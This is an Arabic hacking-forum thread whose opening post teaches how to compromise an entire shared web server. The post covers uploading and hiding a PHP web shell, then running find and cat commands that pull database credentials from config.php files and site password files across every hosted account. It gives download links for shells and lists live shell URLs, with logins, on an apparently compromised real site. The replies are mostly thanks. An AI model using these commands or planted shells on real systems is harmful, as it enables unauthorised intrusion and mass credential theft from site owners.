طريقة لاختراق السيرفر كامل

طريقة لاختراق السيرفر كامل


صفحة 1 من 5 123 ... الأخيرةالأخيرة
النتائج 1 إلى 10 من 46

الموضوع: طريقة لاختراق السيرفر كامل

  1. #1

    Hasri طريقة لاختراق السيرفر كامل

    طريقة اختراق السيرفرات ..

    نفترض انك اخترقت موقع باي ثغره.. او عندك انت موقع لك عند اي سيرفر..

    وتبي تخترق السيرفر.. فهذي بسيطه جدا جدا

    قم بتحميل سكربت الشيل بلغة php على جهازك
    وهذي وصلة الشيل.. (( متطور ))
    http://www.alkaen.taqaniat.net/ShellsAlkaeN.zip
    ------------------------------------------------------------------------------
    بسم الله نبدأ في الشرح ::--

    البي اتش بي شيل ((phpshell )) هو سكربت بلغة (( php ))

    وتستطيع من خلاله تنفيذ اوامر اللينكس.. مثلا احضار باسوردات الـ مواقع التي على السيرفر وايضا قرائة الملف الــ config
    للتي على السيرفر..

    ولاكن لتنفيذ الاوامر هذه يجب عليك ان تقوم بتحميل الــ phpshell
    على موقعك او الموقع الذي اخترقته..

    ومن بعد التحميل سوف تستطيع ان تخترق السيرفر كاملا ..

    وللتوضيح اكثر..

    نفترض انك اخترقت الموقع
    http://www.usa.com/ وقمت بتحميل الــ phpshell
    على ملف download
    فسيصبح العنوان
    www.USA.com/download/phpshell.php

    وثم اذا دخلنا الى العنوان سوف نجد كلمة اسمها Command وامامها فراغ

    في الفراغ هذا سوف نضع فيه اوامر اللينكس..

    ولاكن قبل البدء في الشرح الجدي.. احب اوضح نقطه مهمه ::--

    يمكن لو شاف صاحب الموقع الشيل.. يروح ويحذفه لك وثم تتورط..

    ولاكن لو نسوي اثنين واحد منهم مخفي.. يعني الاول اذا حذفه راح يكون معانا واحد مخفي
    لاخفاءه نسوي كذا بالطريقة هذي
    www.USA.com/download/phpshell.php wget
    وثم نقوم باخفائه.. نقوم بتغيير اسمه الى Mv phpshell.php .phpshell.php
    ماذا تلاحظ ؟ لقط اضفنا نقطة . واذا حذف الاول راح يكون معانا ثاني ومخفي بعد..

    ---------------------------------------------
    ندخل الى موضوعنا

    والان بعد تحميل الشيل على الموقع
    يصبح العنوان مثلا
    www.USA.com/download/phpshell.php

    وثم نجد كتابة اسمها Command وامامها فراغ

    في الفراغ هذا ندخل اوامر اللينكس عليه..

    وندخل الامر هذا مثلا ls /var/named
    وهو لاحضار جميع المواقع التي على السيرفر..

    ولاكن قبل البدء بالاوامر.. قد تستطيع ان تخترق السيرفر كاملا اذا لم يكن عليه الــ سيف مود
    ((safe mode))
    =============---==-- شرح الاوامر --==--==============
    الان سوف اعلمك طريقة سحب : قواعد البيانات - المواقع - الباسوردات

    نبدأ من الاسهل حتى الاصعب.. (( كلها سهله لاكن بالباسوردات ))

    1- قواعد البيانات
    اكتب هذا الامر امام النص Command في الفراغ المقابل له

    اكتب هذا الامر
    find / -name config.php
    الحين راح يطلع لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا :
    usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/forum/config.php
    usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/blacktalons/admin/config.php
    usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
    usr/local/plesk/apache/vhosts/aipep.com/httpdocs/bbs/config.php
    (( المواقع التي على السيرفر قليله جدا جدا وعدد المواقع يكون على حسب عدد المواقع التي على السيرفر.. وانا عادة يخرج لي 300 موقع ))
    ونلاحظ ان التي باللون الزهري هي الموقع..

    طيب نبي نقرأ الي متكوب داخل الملف هذا
    usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
    ونلاحظ ان الموقع هو
    http://www.ainvar.net/ والمنتدى من نوعية phpBB

    المهم نبي نقرأ الي بداخله.. نكتب الامر هذا
    cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php

    وثم راح يطلع لك ملف الــ config.php
    وبداخله يوجد اليوزر نيم والباسورد لقاعدة البيانات

    روح طير للمنتدي وثم لملف الــ admin ودخل اليوزر نيم والباسورد لقاعدة البيانات
    او الدخول له عبر برنامج الــ MySQL-Front_2.5_Setup

    -------------------------------------------------------
    الان انتهينا من قاعدة البيانات باقي باسوردات المواقع..

    اكتب امام Command في الفراغ نكتب هذا الامر
    find / -name service.pwd

    وراح يطلع لنا المواقع بالشكل ذا :
    usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/_vti_pvt/service.pwd
    usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/_vti_pvt/service.pwd
    usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
    usr/local/plesk/apache/vhosts/aipep.com/httpdocs/_vti_pvt/service.pwd
    التي باللون الزهري هي المواقع...
    طيب الان ابي استعرض الباسورد للموقع
    usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
    راح نكتب الامر هذا

    cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd

    وراح يجينا الباسورد للموقع ومشفر بمقياس DES

    ----------------------------------------------------------
    طيب يوجد طريقة اخرى افضل من ذلك

    نكتب الامر هذا
    cat /home/*/public_html/_vti_pvt/service.pwd
    او
    cat /home/*/public_html/_vti_pvt/access.cnf

    وراح يجينا الباسوردات لكل المواقع..

    ويوجد اوامر اخرى كثيره للينكس.. ابحث عنها في المنتديات الاخرى وسوف تجدها ..
    او قول لي وانا اعطيك افضلها واغلبها..

    وهذه بعض اوامر اللينكس

    cat /home/*/public_html/vb/admin/config.php لاحضار باسوردات المنتديات من نوع vb
    cat /home/*/public_html/phpbb/config.php لاحضار باسوردات المنتديات من نوع phpBB
    cat /home/*/public_html/forum/config.php لاحضار باسوردات المنتديات من نوع asp

    وطبعا الباسوردات لقاعدة البيانات

    ولاكنك تلاحظ ان الاوامر يوجد فيها علامة نجمه * وهذه تعني احضار الباسورد لكل المواقع..

    وهذا سكربت ممتاز..

    شباب السكربت لــ Php Shell الي انا نزلته فوق..

    الي قلت لكم تحملونه .. هذاك سكربت متطور جدا وجديد وهو بلغة php
    الي هو هذا
    http://www.alkaen.taqaniat.net/ShellsAlkaeN.zip


    في الحقيقه ماستخدمته ويقولون انه ممتاز جدا جدا ومتطوووووور جدا جدا

    ولاكن يوجد سكربت اخر لــ PhpShell وهو لــ php
    وفي الحقيقة هو هذا الي استخدمه انا داااائمااا
    -----------------------------------------------
    للتحميل (( كليك يمين وحفظ الهدف بااسم ))
    http://www.gimpster.com/downloads/p...hell-latest.zip
    الملف يحتوي علي التالي

    phpshell.php:
    هذا هو السكربت ChangeLog:
    هنا سوف تجد بعض الميزات التي اضيفت الي هذا الاصدار
    README:
    هذا ملف فيه الشرح والتعليمات (( اعتقد ان شرحي افضل منه ))
    INSTALL:
    هذا الملف يخبرك عن كيفية حماية الphp shell بباسوورد
    واخيرا جبت لكم مووقع اخترقه واحد يقاله شبح الليل..
    من فريق عمل منتدى الليزر..

    منزل لكم شيل على الموقع الي هو مخترقه..

    4 شيلات

    المهم انا اخذتها من المنتدى وحطيتها هنا عشان تستفيدون وتطبقون الاوامر عليه وتعرفون كيف..

    1- الشيل الاول
    وهذا رابط شيل قد وجته ووجدت ايضا اليوز وبالباس

    اليوزر : lezr

    الباسورد : lezr_vb

    http://www.tribal-vision.com/images/tv_lar.php
    ----------------------------------------
    2- الشيل الثاني (( ممتاز جدا ))
    http://www.tribal-vision.com/images/tv_la1.php

    اليوزر : root

    لايوجد باسورد بس اكتب اليوزر وثم ادخل على طوول
    -----------------------------------
    3- الشيل الثالث
    http://www.tribal-vision.com/images/tv_la2.php

    ----------------------------------
    4- الشيل الرابع
    http://www.tribal-vision.com/images/triebes.php
    فيديو اليوم


    اللهم صلي على سيدنا محمد ، على عَدد خَلقِك وَعلى قدر عَظَمَتك وعلى قَدرٍ محبتك له .

    سجل إختراقك الأن في Aljyyosh.org بمميزات عديده



    من مواضيعي:


    سُبْحَانَكَ اللَّهُمَّ وبَحَمْدكَ أشْهدُ أنْ لا إلهَ إلا أنْتَ أَسْتَغْفِرُكَ وأتُوبُ إِلَيْكَ

  2. #2

    افتراضي رد: طريقة اختراق السيرفر كاملا

    شكرا لك اخي
    بس كيف تخترق السيرفر هذا هو المشكل

  3. #3

    افتراضي رد: طريقة اختراق السيرفر كاملا

    بارك الله فيك

  4. #4

    افتراضي رد: طريقة اختراق السيرفر كاملا

    والله شرح رائع بس رابط الشل خطا

  5. #5
    هكر نشيط الصورة الرمزية جندي اول للهكر
    تاريخ التسجيل
    Aug 2009
    الدولة
    البلاد المظلمه >الجيوش<
    المشاركات
    108

    افتراضي رد: طريقة اختراق السيرفر كاملا

    وواللللللله كبير والله كبير والله كبير

  6. #6

    افتراضي رد: طريقة لاختراق السيرفر كامل

    mercccccccccciiiiiiiiiiiiiiiii

  7. #7

    افتراضي رد: طريقة اختراق السيرفر كاملا

    merccccccccccccccccccccccciiiiiiiiiiiiiiiii

  8. #8

    افتراضي رد: طريقة اختراق السيرفر كاملا

    k,yhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh

  9. #9

    افتراضي رد: طريقة لاختراق السيرفر كامل

    بارك الله فيك

  10. #10

    افتراضي رد: طريقة لاختراق السيرفر كامل

    This is the first book available for the Metasploit Framework (MSF),

صفحة 1 من 5 123 ... الأخيرةالأخيرة

المواضيع المتشابهه

  1. طريقة أخذ روت السيرفر والتحكم بالسيرفر كاملا
    بواسطة She!! Access في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 10
    آخر مشاركة: 05-21-2017, 05:31 AM
  2. برنامج HEX Workshop v.6 كامل
    بواسطة Young.Hacker في المنتدى منتدى البرامج - تحميل برامج
    مشاركات: 3
    آخر مشاركة: 05-29-2015, 11:46 PM
  3. طريقة خبيثة لاختراق ايميلك
    بواسطة cracker في المنتدى منتدى إختراق البريد والايميلات
    مشاركات: 24
    آخر مشاركة: 02-11-2012, 01:59 AM
  4. طريقة تغيير الهوست نيم ( اسم السيرفر )
    بواسطة BLACK.JaGuAr في المنتدى دروس و شروحات السيرفرات
    مشاركات: 9
    آخر مشاركة: 01-28-2012, 08:42 AM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •